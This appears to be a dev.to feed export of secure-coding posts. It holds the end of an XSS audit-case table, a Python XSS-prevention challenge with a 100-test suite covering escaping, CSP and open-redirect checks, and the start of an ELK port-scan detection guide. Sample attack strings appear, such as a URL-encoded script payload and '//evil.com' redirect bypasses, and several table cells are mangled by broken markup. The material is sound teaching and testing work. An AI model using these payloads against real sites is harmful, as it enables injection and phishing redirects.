<code>innerHTML</code> sink</td> <td>Remove <code>escape()</code>; `\</td> </tr> <tr> <td>39</td> <td>FastAPI</td> <td>Stored</td> <td>Misplaced</td> <td>HTML body (f-string HTML)</td> <td>Store raw; use {% raw %}<code>Jinja2Templates</code> </td> </tr> <tr> <td>40</td> <td>Flask</td> <td>Stored</td> <td>Wrong context</td> <td>JS string in <code>&lt;script&gt;</code> </td> <td>`\</td> </tr> <tr> <td>41</td> <td>Django</td> <td>Stored</td> <td>Missing ({% raw %}`\</td> <td>safe`)</td> <td>HTML body</td> </tr> <tr> <td>42</td> <td>Flask</td> <td>None</td> <td>Display only</td> <td>—</td> <td>Remove <code>escape()</code> at storage</td> </tr> <tr> <td>43</td> <td>Django</td> <td>Stored</td> <td>Missing (`\</td> <td>safe`)</td> <td>HTML body</td> </tr> <tr> <td>44</td> <td>FastAPI</td> <td>Stored</td> <td>Missing</td> <td> <code>innerHTML</code> sink inside JS function</td> <td> <code>createElement</code> + <code>textContent</code> in <code>renderComment()</code> </td> </tr> <tr> <td>45</td> <td>Flask</td> <td>Reflected</td> <td>Wrong context</td> <td>JS string arguments</td> <td>`\</td> </tr> <tr> <td>46</td> <td>Vanilla JS</td> <td>DOM</td> <td>Missing</td> <td>{% raw %}<code>innerHTML</code> sink</td> <td>Replace with <code>textContent</code> </td> </tr> <tr> <td>47</td> <td>Django</td> <td>Reflected</td> <td>Wrong context</td> <td>JS string in <code>&lt;script&gt;</code> </td> <td>Remove <code>escape()</code>; `\</td> </tr> <tr> <td>48</td> <td>FastAPI</td> <td>Stored</td> <td>Missing</td> <td>{% raw %}<code>innerHTML</code> sink inside JS function</td> <td> <code>createElement</code> + <code>textContent</code> in <code>loadArticle()</code> </td> </tr> <tr> <td>49</td> <td>Django</td> <td>None</td> <td>Display only</td> <td>—</td> <td>Remove <code>escape()</code> </td> </tr> <tr> <td>50</td> <td>Flask</td> <td>Reflected</td> <td>Missing</td> <td>JS string in <code>onclick</code> attribute</td> <td>`\</td> </tr> <tr> <td>51</td> <td>Vanilla JS</td> <td>DOM</td> <td>Missing</td> <td>Template literal {% raw %}<code>innerHTML</code> </td> <td> <code>createElement</code> + <code>textContent</code> </td> </tr> <tr> <td>52</td> <td>Flask</td> <td>Stored</td> <td>Missing</td> <td> <code>innerHTML</code> sinks in JS function</td> <td>Replace with <code>textContent</code> </td> </tr> <tr> <td>53</td> <td>FastAPI</td> <td>None</td> <td>Display only</td> <td>—</td> <td>Remove <code>escape()</code> + <code>str()</code> </td> </tr> <tr> <td>54</td> <td>FastAPI</td> <td>Stored</td> <td>Wrong context (A) + Missing (B)</td> <td>JS string <code>onclick</code> + <code>innerHTML</code> sink</td> <td>`\</td> </tr> <tr> <td>55</td> <td>Flask</td> <td>Stored</td> <td>Missing ({% raw %}<code>Markup()</code>)</td> <td>HTML body</td> <td>Remove <code>Markup()</code>; store raw</td> </tr> <tr> <td>56</td> <td>Flask</td> <td>Stored</td> <td>Missing (`\</td> <td>safe`)</td> <td>HTML body</td> </tr> <tr> <td>57</td> <td>Django</td> <td>Stored</td> <td>Missing (<code>mark_safe()</code>)</td> <td>HTML body</td> <td>Remove <code>mark_safe()</code> </td> </tr> <tr> <td>58</td> <td>Django</td> <td>Stored</td> <td>Missing (<code>{% autoescape off %}</code>)</td> <td>HTML body</td> <td>Remove <code>{% autoescape off %}</code> block</td> </tr> <tr> <td>59</td> <td>Django</td> <td>Stored</td> <td>Missing (<code>format_html()</code> no-arg misuse)</td> <td>HTML body</td> <td>Remove <code>format_html()</code>; use <code>{{ product.badge_html }}</code> </td> </tr> <tr> <td>60</td> <td>Django</td> <td>Stored</td> <td>Missing (<code>format_html()</code> + f-string)</td> <td>HTML body</td> <td>Remove f-string; pass both fields as <code>{}</code> args</td> </tr> <tr> <td>61</td> <td>Django</td> <td>Stored</td> <td>Missing (<code>mark_safe()</code> in model method)</td> <td>HTML body</td> <td>Return raw string from <code>get_username_display()</code> </td> </tr> <tr> <td>62</td> <td>Django</td> <td>Stored</td> <td>Wrong context</td> <td>JS string + <code>innerHTML</code> sink</td> <td>Remove <code>escape()</code>; `\</td> </tr> <tr> <td>63</td> <td>Flask</td> <td>Stored</td> <td>Missing ({% raw %}<code>Markup(x)</code> in utility function)</td> <td>HTML body</td> <td>Delete utility function; pass raw model objects; let Jinja2 autoescape</td> </tr> <tr> <td>64</td> <td>Django</td> <td>Stored</td> <td>Wrong context (two layers)</td> <td>JS string + <code>innerHTML</code> + inline <code>onclick</code> </td> <td>`\</td> </tr> <tr> <td>65</td> <td>Django</td> <td>Stored</td> <td>Missing ({% raw %}<code>format_html()</code> + f-string)</td> <td>HTML body</td> <td>Delete <code>format_html()</code>; pass raw object; move HTML to template</td> </tr> <tr> <td>66</td> <td>Django</td> <td>Stored</td> <td>Missing (<code>mark_safe()</code> arg to <code>format_html()</code>)</td> <td>HTML body</td> <td>Delete <code>format_html()</code> + <code>mark_safe()</code>; pass raw fields</td> </tr> <tr> <td>67</td> <td>Flask</td> <td>Stored</td> <td>Wrong context (double-quoted <code>tojson</code>) + Missing (<code>innerHTML</code>)</td> <td>JS string + <code>innerHTML</code> sink</td> <td>Remove outer quotes; `\</td> </tr> <tr> <td>68</td> <td>Django</td> <td>Stored</td> <td>Missing ({% raw %}<code>mark_safe()</code> on <code>bio_preview</code>)</td> <td>HTML body</td> <td>Delete <code>format_html()</code> + <code>mark_safe()</code>; pass raw fields; move <code>&lt;em&gt;</code> to template</td> </tr> <tr> <td>69</td> <td>FastAPI</td> <td>Stored</td> <td>Wrong context (double-quoted <code>tojson</code>) + Missing (<code>innerHTML</code> ×2)</td> <td>JS string + two <code>innerHTML</code> sinks</td> <td>Remove outer quotes; <code>createElement</code> + <code>textContent</code> in both render functions</td> </tr> <tr> <td>70</td> <td>Django</td> <td>None</td> <td>Display only (double-escape at storage + corrupted JSON API)</td> <td>—</td> <td>Remove <code>escape()</code>; store raw; let Django autoescape at render</td> </tr> </tbody> </table></div> <p><em>This blog post is part of an ongoing series on web application security. The secure coding exercises and audit cases are contributed to the P2P open source project for curating high-quality secure code training datasets. References: OWASP XSS Prevention Cheat Sheet; Dennis Byrne, Full Stack Python Security (Manning, 2022); Jonathan Johansen et al., Secure by Design (Manning, 2019).</em></p> <h2> Before You Go — Two Quick Things </h2> <p><strong>1. ⭐ Star the repo</strong></p> <p>All 70 of these cases, plus challenges covering SQL injection, authentication, API security, and more, live in <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">SecEng-Exercises on GitHub</a>. The project's goal is to build a high-quality, open dataset of secure coding exercises that can be used to train AI models to write <em>less</em> vulnerable code — addressing the core problem that today's models learned from billions of lines of public code, including a lot of vulnerable patterns. If you got anything out of this post, a star costs you one click and helps the project get discovered by other developers and security engineers who'd benefit from it.</p> <p><strong>2. 📊 Take the 30-second poll</strong></p> <p>I'm running a poll to understand what the security community thinks is the most dangerous XSS escaping mistake in production code today. Your answer will directly shape which vulnerability classes I prioritize in future challenge sets.</p> <p>👉 <strong><a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">Cast your vote here</a></strong></p> <p>Results will be shared in the next post in this series.</p> security webdev python javascript fosres Wed, 04 Mar 2026 23:24:23 +0000 https://dev.to/fosres/security-challenge-build-an-xss-prevention-framework-in-python-100-tests-4i81 https://dev.to/fosres/security-challenge-build-an-xss-prevention-framework-in-python-100-tests-4i81 <h1> Security Challenge: Build an XSS Prevention Framework in Python </h1> <p><strong>Time:</strong> 60–90 minutes<br><br> <strong>Difficulty:</strong> Intermediate<br><br> <strong>Skills:</strong> Web Application Security, Output Escaping, CSP, Open Redirect Prevention, Python OOP</p> <h2> The Hook: 22 Lines That Broke British Airways </h2> <p>In 2018, attackers injected 22 lines of JavaScript into British Airways' payment page. For 15 days, every customer who typed their credit card number had it silently copied and sent to an attacker-controlled server. Around 500,000 customers were affected. The UK ICO fined British Airways £20 million.</p> <p>The root cause? Unsanitized content rendered in the wrong context — the textbook definition of XSS.</p> <p>This challenge asks you to build the framework that prevents that.</p> <blockquote> <p>⭐ <strong>If this challenge is useful to you, please <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">star the repo on GitHub</a></strong> — it helps surface these exercises for other Security Engineers.</p> <p>📊 <strong>Quick question:</strong> <a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">Why are you reading this post?</a> (30-second poll — genuinely useful for knowing what to write next)</p> </blockquote> <h2> How Often Do Security Engineers Actually Deal With This? </h2> <p>It depends heavily on which type of Security Engineering role you're in.</p> <p><strong>Product Security Engineers at large tech companies</strong> — you'll <em>audit</em> output encoding regularly but <em>implement</em> it from scratch rarely. The workflow looks like this in practice:</p> <ul> <li>Code review flags a place where user-controlled data is rendered without escaping, you file a bug, and the owning developer fixes it</li> <li>You write a Semgrep rule that detects the pattern statically so it never reaches review in the first place</li> <li>You update the secure coding guidelines or developer training to explain the correct escaping approach for each context</li> <li>You evaluate whether a framework's auto-escaping is being bypassed — the Django <code>|safe</code> filter situation that Byrne calls out explicitly in <em>Full Stack Python Security</em> (pp. 219-221) is a real and common example of this</li> </ul> <p>Modern web frameworks handle HTML body context automatically. What trips teams up in practice is the other four contexts: JavaScript, URL, attribute, and CSP. Those are where real vulnerabilities appear because developers know the framework covers HTML body output but forget that it doesn't cover everything else.</p> <p><strong>Security consulting and penetration testing roles</strong> — you encounter output encoding failures constantly, but from the attacker side. You're identifying missing or incorrect escaping in client codebases, writing proof-of-concept payloads, and documenting remediation paths. The polyglot and bypass test category in this exercise maps directly to that work.</p> <p><strong>The real day-to-day value of this exercise</strong> is that it forces you to understand <em>why</em> each context is different at the mechanism level — which is exactly what Security Engineers are asked in code review scenarios and system design interviews. A question like "how does Django's template engine protect against XSS and where does that protection break down?" is entirely answerable from working through this exercise. That's a far more common interview question than "implement <code>escape_javascript</code> from scratch."</p> <p>So: audit output encoding — frequently. Implement it from scratch — rarely. But understanding how it works at this level is what separates engineers who understand security from engineers who have merely used security tools.</p> <h2> Why Input Sanitization Is the Wrong Answer </h2> <p>Before you write a single line of code, internalize this principle from <em>Full Stack Python Security</em> (Ch. 14, p. 218, Dennis Byrne, Manning 2021):</p> <blockquote> <p>"Input sanitization is always a bad idea because it is too difficult to implement."</p> </blockquote> <p>Here's why. A sanitizer has to identify malicious content across at least three interpreters simultaneously: JavaScript, HTML, and CSS. Miss one context and you're back to square one. Worse, sanitizers corrupt legitimate data — a forum where users can post code snippets would mangle every post.</p> <p>The correct defense, as Byrne explains, is <strong>context-aware output escaping</strong>. A <code>&lt;</code> character is <em>only dangerous when rendered as HTML</em>. Escape it at the output layer, in the correct context. Leave the input alone.</p> <p><em>Secure by Design</em> (Ch. 9, pp. 247-249, Johnsson, Deogun, Sawano, Manning 2019) adds another sharp insight: never echo input verbatim in error messages. Even a URL-encoded payload like <code>%3Cscript%3Ealert(1)%3C%2Fscript%3E</code> becomes executable XSS inside a browser-based log analysis tool that doesn't escape its output.</p> <h2> The Five Output Contexts </h2> <p>XSS is not one problem — it is five problems, one per output context. Each context requires a different escaping strategy:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Context</th> <th>Example</th> <th>Wrong escape</th> <th>Right escape</th> </tr> </thead> <tbody> <tr> <td>HTML body</td> <td><code>&lt;p&gt;{{ user_bio }}&lt;/p&gt;</code></td> <td>Strip <code>&lt;&gt;</code> </td> <td>Replace <code>&lt; &gt; &amp; " '</code> with entities</td> </tr> <tr> <td>HTML attribute</td> <td><code>&lt;input value="{{ name }}"&gt;</code></td> <td>HTML-escape only</td> <td>Also escape <code>"</code> and <code>'</code> </td> </tr> <tr> <td>JavaScript string</td> <td><code>var name = "{{ name }}";</code></td> <td>HTML-escape</td> <td>Backslash-escape + Unicode for <code>&lt; &gt; &amp;</code> </td> </tr> <tr> <td>URL parameter</td> <td><code>href="/search?q={{ query }}"</code></td> <td>URL-encode only reserved chars</td> <td>Percent-encode everything except RFC 3986 unreserved chars</td> </tr> <tr> <td>CSP header</td> <td><code>Content-Security-Policy: ...</code></td> <td>N/A</td> <td>Build correct directive syntax</td> </tr> </tbody> </table></div> <p>Apply the HTML body escaper to a JavaScript string and you will break the page. Apply the JavaScript escaper to a URL and you will corrupt the link. Context mismatch is exactly how most real XSS vulnerabilities arise.</p> <h2> The Challenge </h2> <p>Implement the <code>XSSPrevention</code> class with six methods:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">XSSPrevention</span><span class="p">:</span> <span class="k">def</span> <span class="nf">escape_html</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">text</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> <span class="sh">"""</span><span class="s">Escape for HTML body context.</span><span class="sh">"""</span> <span class="k">pass</span> <span class="k">def</span> <span class="nf">escape_attribute</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">text</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> <span class="sh">"""</span><span class="s">Escape for HTML attribute value context.</span><span class="sh">"""</span> <span class="k">pass</span> <span class="k">def</span> <span class="nf">escape_javascript</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">text</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> <span class="sh">"""</span><span class="s">Escape for JavaScript string literal context.</span><span class="sh">"""</span> <span class="k">pass</span> <span class="k">def</span> <span class="nf">escape_url</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">text</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> <span class="sh">"""</span><span class="s">Percent-encode for URL query parameter context.</span><span class="sh">"""</span> <span class="k">pass</span> <span class="k">def</span> <span class="nf">build_csp_header</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">directives</span><span class="p">:</span> <span class="nb">dict</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> <span class="sh">"""</span><span class="s">Build a Content-Security-Policy header value.</span><span class="sh">"""</span> <span class="k">pass</span> <span class="k">def</span> <span class="nf">is_safe_url</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">url</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">allowed_hosts</span><span class="p">:</span> <span class="nb">list</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">bool</span><span class="p">:</span> <span class="sh">"""</span><span class="s">Return True only if the URL is safe for redirect.</span><span class="sh">"""</span> <span class="k">pass</span> </code></pre> </div> <p>No imports from third-party libraries. No Django or Flask. Pure Python.</p> <h2> Why This Is Harder Than It Looks </h2> <h3> Edge Case 1: Ampersand Must Be Escaped First </h3> <p>If you escape <code>&lt;</code> before <code>&amp;</code>, you get double-encoding bugs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># WRONG order </span><span class="sh">"</span><span class="s">&lt;b&gt;Tom &amp; Jerry&lt;/b&gt;</span><span class="sh">"</span> <span class="err">→</span> <span class="sh">"</span><span class="s">&amp;lt;b&amp;gt;Tom &amp;amp;lt; Jerry&amp;lt;/b&amp;gt;</span><span class="sh">"</span> <span class="c1"># &amp;lt; doubled! </span> <span class="c1"># CORRECT order: &amp; first, then &lt; &gt; </span><span class="sh">"</span><span class="s">&lt;b&gt;Tom &amp; Jerry&lt;/b&gt;</span><span class="sh">"</span> <span class="err">→</span> <span class="sh">"</span><span class="s">&amp;lt;b&amp;gt;Tom &amp;amp; Jerry&amp;lt;/b&amp;gt;</span><span class="sh">"</span> </code></pre> </div> <p><em>Full Stack Python Security</em> Table 14.1 (p. 219) lists the five characters and implies the correct replacement order.</p> <h3> Edge Case 2: JavaScript Context Needs Backslash First </h3> <p>In JS string escaping, if you escape quotes before backslashes, you corrupt existing escape sequences:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Input: back\slash # WRONG: escape " before \ </span><span class="sh">"</span><span class="s">back</span><span class="se">\\</span><span class="s">slash</span><span class="sh">"</span> <span class="err">→</span> <span class="sh">"</span><span class="s">back</span><span class="se">\\</span><span class="s">slash</span><span class="sh">"</span> <span class="c1"># \ not escaped, \s survives as-is </span> <span class="c1"># CORRECT: escape \ first, then quotes </span><span class="sh">"</span><span class="s">back</span><span class="se">\\</span><span class="s">slash</span><span class="sh">"</span> <span class="err">→</span> <span class="sh">"</span><span class="s">back</span><span class="se">\\\\</span><span class="s">slash</span><span class="sh">"</span> </code></pre> </div> <h3> Edge Case 3: <code>&lt;/script&gt;</code> Inside a JS Block </h3> <p>Even inside a <code>&lt;script&gt;</code> tag, a <code>&lt;/script&gt;</code> substring in a string literal will prematurely close the script block. The fix is to escape <code>&lt;</code> and <code>&gt;</code> to Unicode escapes (<code>\u003C</code>, <code>\u003E</code>) so the browser never sees the raw characters:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">xss</span><span class="p">.</span><span class="nf">escape_javascript</span><span class="p">(</span><span class="sh">"</span><span class="s">&lt;/script&gt;</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># → "\\u003C/script\\u003E" </span></code></pre> </div> <h3> Edge Case 4: Valueless CSP Directives </h3> <p>Some CSP directives take no value — <code>upgrade-insecure-requests</code> is the most common. Your <code>build_csp_header</code> must output <code>upgrade-insecure-requests</code> (no trailing space) when the value is an empty string, not <code>upgrade-insecure-requests</code> (with a space).</p> <h3> Edge Case 5: Protocol-Relative URLs </h3> <p>An open redirect validator that only checks for <code>http://</code> and <code>https://</code> will miss <code>//evil.com/path</code> — a protocol-relative URL that the browser resolves using whatever scheme the current page uses. It must always return <code>False</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">xss</span><span class="p">.</span><span class="nf">is_safe_url</span><span class="p">(</span><span class="sh">"</span><span class="s">//evil.com/path</span><span class="sh">"</span><span class="p">,</span> <span class="p">[</span><span class="sh">"</span><span class="s">example.com</span><span class="sh">"</span><span class="p">])</span> <span class="c1"># → False (protocol-relative, not a safe relative path) </span></code></pre> </div> <h2> The 100-Test Gauntlet </h2> <p>Your implementation faces 100 deterministic tests across ten categories — ten tests per category:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>#</th> <th>Category</th> <th>What It Tests</th> </tr> </thead> <tbody> <tr> <td>1–10</td> <td>HTML Body Escaping</td> <td>The five dangerous HTML chars, img/svg payloads, combined cases</td> </tr> <tr> <td>11–20</td> <td>HTML Attribute Escaping</td> <td>Quote breakout, event handler injection, edge chars</td> </tr> <tr> <td>21–30</td> <td>JavaScript String Escaping</td> <td>Backslash order, newlines, <code>&lt;/script&gt;</code> Unicode escape</td> </tr> <tr> <td>31–40</td> <td>URL Parameter Escaping</td> <td>RFC 3986 unreserved chars, double-encoding, Unicode</td> </tr> <tr> <td>41–50</td> <td>Polyglot &amp; Bypass Attempts</td> <td>Gareth Heyes polyglot, null bytes, pre-encoded entities</td> </tr> <tr> <td>51–60</td> <td>CSP Header Building</td> <td>Directive syntax, valueless directives, order preservation</td> </tr> <tr> <td>61–70</td> <td>Open Redirect Prevention</td> <td> <code>javascript:</code>, <code>data:</code>, <code>vbscript:</code>, <code>//</code>, subdomain bypass</td> </tr> <tr> <td>71–80</td> <td>HTML Depth &amp; Edge Cases</td> <td>Double-encoding prevention, template literals, long strings</td> </tr> <tr> <td>81–90</td> <td>JS &amp; URL Advanced Edge Cases</td> <td>Tab preservation, at-sign encoding, multiple allowed hosts</td> </tr> <tr> <td>91–100</td> <td>Redirect Security Edge Cases</td> <td> <code>javascript://</code> authority bypass, port-bearing URLs, scheme case-sensitivity</td> </tr> </tbody> </table></div> <h3> Sample Output </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>╔════════════════════════════════════════════════════════════════════╗ ║ XSS PREVENTION FRAMEWORK — 100 COMPREHENSIVE TESTS ║ ╚════════════════════════════════════════════════════════════════════╝ HTML Body Escaping (10/10) ✅ PASS Test 01 [HTML] Classic &lt;script&gt; tag ✅ PASS Test 02 [HTML] Ampersand escape (must come before &lt; &gt;) ... JavaScript String Escaping (7/10) ✅ PASS Test 21 [JS] Single-quote breakout ✅ PASS Test 22 [JS] Double-quote breakout ❌ FAIL Test 23 [JS] Backslash must be escaped first Expected: 'back\\\\slash' Got: 'back\\slash' ... ══════════════════════════════════════════════════════════════════════ SCORE: 74/100 (74%) Almost there! Review the failed categories above. Hint: Ensure escaping is truly context-specific — HTML body ≠ attribute ≠ JS string ≠ URL parameter. </code></pre> </div> <h2> What Real-World XSS Prevention Looks Like </h2> <p>After you complete the exercise, compare your implementation to how production frameworks handle this:</p> <p><strong>Django</strong> auto-escapes HTML body context via its template engine — but it does <em>not</em> auto-escape JavaScript or URL contexts. You still need to use <code>escapejs</code> and <code>urlencode</code> template filters explicitly. (<em>Full Stack Python Security</em>, pp. 219-221)</p> <p><strong>OWASP ESAPI</strong> is the reference implementation of context-aware escaping for Java, and provides the mental model your implementation should follow for all six contexts.</p> <p><strong>Content-Security-Policy</strong> is your Layer 3 defense — even if an attacker injects a payload, a strict CSP <code>script-src 'nonce-{random}'</code> policy prevents it from executing. Your <code>build_csp_header</code> method is the foundation of that defense. (<em>Full Stack Python Security</em>, pp. 234-236)</p> <h2> Common Mistakes </h2> <h3> ❌ Mistake 1: Sanitizing Instead of Escaping </h3> <p>Stripping <code>&lt;</code> and <code>&gt;</code> from input prevents legitimate use cases (code snippets, mathematical notation) and fails against encoded variants like <code>%3C</code> in URL context.</p> <h3> ❌ Mistake 2: Using the Same Escaper for All Contexts </h3> <p><code>escape_html</code> is not safe for JavaScript string context. <code>&amp;lt;</code> inside a JS string literal renders as <code>&amp;lt;</code> — it does not prevent <code>&lt;/script&gt;</code> breakout.</p> <h3> ❌ Mistake 3: Forgetting That <code>//</code> Is a Valid URL Prefix </h3> <p>Protocol-relative URLs like <code>//evil.com</code> are a classic open redirect bypass that trips up validators checking only for <code>http://evil.com</code>.</p> <h3> ❌ Mistake 4: Adding a Trailing Space to Valueless CSP Directives </h3> <p><code>upgrade-insecure-requests</code> (with a trailing space) is a malformed CSP directive. Some browsers will ignore it silently.</p> <h3> ❌ Mistake 5: Escaping <code>&amp;</code> Last </h3> <p>If you run <code>text.replace('&lt;', '&amp;lt;')</code> before <code>text.replace('&amp;', '&amp;amp;')</code>, an input of <code>&amp;lt;</code> gets double-encoded to <code>&amp;amp;lt;</code> instead of <code>&amp;amp;lt;</code>. Always escape <code>&amp;</code> first.</p> <h2> The Exercise </h2> <h3> Get the Challenge File </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Download from the P2P AppSec Exercises repository</span> git clone https://github.com/fosres/SecEng-Exercises <span class="nb">cd </span>SecEng-Exercises/xss python3 xss_prevention_100_tests.py </code></pre> </div> <h3> What You'll Get </h3> <ul> <li>A single Python file with the empty <code>XSSPrevention</code> class</li> <li>100 deterministic test cases with colored pass/fail output</li> <li>Detailed failure messages showing expected vs. actual output</li> <li>Progressive hints based on your score</li> </ul> <h2> What You'll Learn </h2> <ul> <li>✅ Why output context — not input sanitization — is the correct XSS defense</li> <li>✅ The five HTML special characters and the correct escaping order</li> <li>✅ Why JavaScript string context requires a different escaping strategy than HTML</li> <li>✅ How <code>&lt;/script&gt;</code> inside a JS string literal closes the script block prematurely</li> <li>✅ RFC 3986 unreserved characters and percent-encoding for URL query parameters</li> <li>✅ Content-Security-Policy directive syntax including valueless directives</li> <li>✅ The three classes of dangerous URL schemes: <code>javascript:</code>, <code>data:</code>, <code>vbscript:</code> </li> <li>✅ Protocol-relative URL bypass in open redirect validators</li> </ul> <h2> For Hiring Managers </h2> <p>This exercise assesses:</p> <ul> <li> <strong>Security fundamentals</strong> — understanding of XSS at the mechanism level, not just "what is XSS"</li> <li> <strong>Context-awareness</strong> — recognizing that the same data requires different escaping depending on where it is rendered</li> <li> <strong>Defensive programming</strong> — implementing defense in depth rather than a single escaping pass</li> <li> <strong>Python fluency</strong> — clean, idiomatic string handling and OOP design</li> <li> <strong>Attention to edge cases</strong> — the polyglot and bypass test category specifically rewards candidates who think like attackers while writing defensive code</li> </ul> <p>A candidate who passes all 100 tests has demonstrated the foundational secure coding knowledge expected of an Application Security Engineer at the junior-to-mid level.</p> <h2> Level Up: After You Pass </h2> <ol> <li> <strong>Extend the framework</strong> — add <code>escape_css()</code> for safe CSS value insertion, another context Django's template engine does not auto-escape</li> <li> <strong>Build a linter</strong> — write a Semgrep rule that detects raw string interpolation into HTML templates in Python codebases (the vulnerability your framework prevents)</li> <li> <strong>Integrate CSP reporting</strong> — extend <code>build_csp_header</code> to support <code>report-to</code> groups with a JSON policy endpoint configuration</li> <li> <strong>Read the source</strong> — compare your <code>escape_html</code> to Django's <code>django.utils.html.escape</code> and note what it does and does not cover</li> </ol> <h2> Resources </h2> <ul> <li> <em>Full Stack Python Security</em>, Ch. 14 — Dennis Byrne (Manning, 2021): the definitive treatment of XSS defense in Django</li> <li> <em>Secure by Design</em>, Ch. 9, pp. 247-249 — Johnsson, Deogun, Sawano (Manning, 2019): why never echoing input verbatim matters even in error messages</li> <li> <a href="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" rel="noopener noreferrer">OWASP XSS Prevention Cheat Sheet</a> — canonical escaping rules for all output contexts</li> <li> <a href="https://portswigger.net/web-security/cross-site-scripting" rel="noopener noreferrer">Web Security Academy XSS Learning Path</a> — hands-on labs for the attacker's perspective</li> <li> <a href="https://tools.ietf.org/html/rfc3986#section-2.3" rel="noopener noreferrer">RFC 3986</a> — unreserved character definition for URL escaping</li> </ul> <p><em>This challenge is part of the P2P AppSec Exercise Series — a collection of LeetCode-style secure coding exercises designed to curate high-quality, secure Python code for AI training datasets. The goal: train AI models to write secure code by default.</em></p> <p><em>→ <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">SecEng-Exercises on GitHub</a></em><br><br> <em>→ <a href="https://dev.to/fosres">More challenges on dev.to/fosres</a></em></p> <h2> Get the Files </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>File</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td><a href="https://github.com/fosres/SecEng-Exercises/blob/main/xss/xss_prevention_100_tests.py" rel="noopener noreferrer">xss_prevention_100_tests.py</a></td> <td> <strong>Challenge file</strong> — empty <code>XSSPrevention</code> class + full 100-test suite. Start here.</td> </tr> <tr> <td><a href="https://github.com/fosres/SecEng-Exercises/blob/main/xss/xss_prevention_100_tests_solution.py" rel="noopener noreferrer">xss_prevention_100_tests_solution.py</a></td> <td> <strong>Solution file</strong> — reference implementation. Check this after you pass, not before.</td> </tr> </tbody> </table></div> <p>Both files live in the <a href="https://github.com/fosres/SecEng-Exercises/tree/main/xss" rel="noopener noreferrer"><code>xss/</code> directory</a> of the <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">SecEng-Exercises repository</a>.</p> <p>If these exercises are useful to you, a ⭐ <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">star on the repo</a> helps other Security Engineers find them. And if you have a minute, <a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">let me know why you read this post</a> — it directly shapes what I write next.</p> security python appsec challenge fosres Mon, 02 Mar 2026 23:26:21 +0000 https://dev.to/fosres/week-8-challenge-use-elk-for-port-scan-detection-2h0o https://dev.to/fosres/week-8-challenge-use-elk-for-port-scan-detection-2h0o <p><strong>Tags:</strong> <code>security</code>, <code>elasticsearch</code>, <code>linux</code>, <code>networking</code><br> series: Security Engineering Interview Prep</p> <h2> published: true </h2> <blockquote> <p>💡 <strong>Before you dive in</strong> — if you find this useful, please ⭐ star my open source project<br> <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer"><strong>SecEng-Exercises</strong></a> on GitHub. It's a growing<br> collection of security engineering exercises designed to help engineers write more secure code<br> and break into Security Engineering roles.</p> <p>📊 Also — I'd love to know <strong>why you read security engineering blog posts</strong>.<br> <a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer"><strong>Take my 30-second poll here</strong></a> and check the live<br> results. I use the data to write better content.</p> </blockquote> <blockquote> <p><strong>This is Part 2 of the ELK SIEM series.</strong><br> Part 1 covered deploying ELK with X-Pack security and detecting SSH brute force attacks.<br> This post assumes your ELK stack is already running. If not, start with Part 1 first.</p> </blockquote> <h2> A Horror Story First </h2> <p>A penetration tester lands initial access on a corporate network via a phishing email. Before<br> doing anything noisy, he runs a quiet port scan — probing thousands of ports across dozens of<br> internal hosts, mapping the attack surface: open RDP ports, exposed databases, unpatched<br> services.</p> <p>He takes his time. The entire reconnaissance phase lasts 20 minutes.</p> <p>The security team notices nothing. No alert fires. No analyst investigates. The logs are<br> there — the firewall logged every blocked connection — but nobody built a rule to watch for<br> the pattern.</p> <p>Three days later the attacker has domain admin. The port scan was the first domino.</p> <p>Port scanning is not an attack in itself. It's reconnaissance — the attacker mapping your<br> network before they strike. Detecting it early gives you a critical window to respond before<br> the real attack begins. This guide builds that detection layer.</p> <h2> What You'll Build </h2> <p>A Kibana detection rule that fires when a single IP address probes more than 15 distinct<br> destination ports within 60 seconds — the signature of an automated port scan.</p> <p>The pipeline:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>UFW firewall → rsyslog → /var/log/ufw.log → Logstash (parse) → Elasticsearch (store) → Kibana threshold rule (fires when src_ip hits 15+ distinct ports / 60 sec) </code></pre> </div> 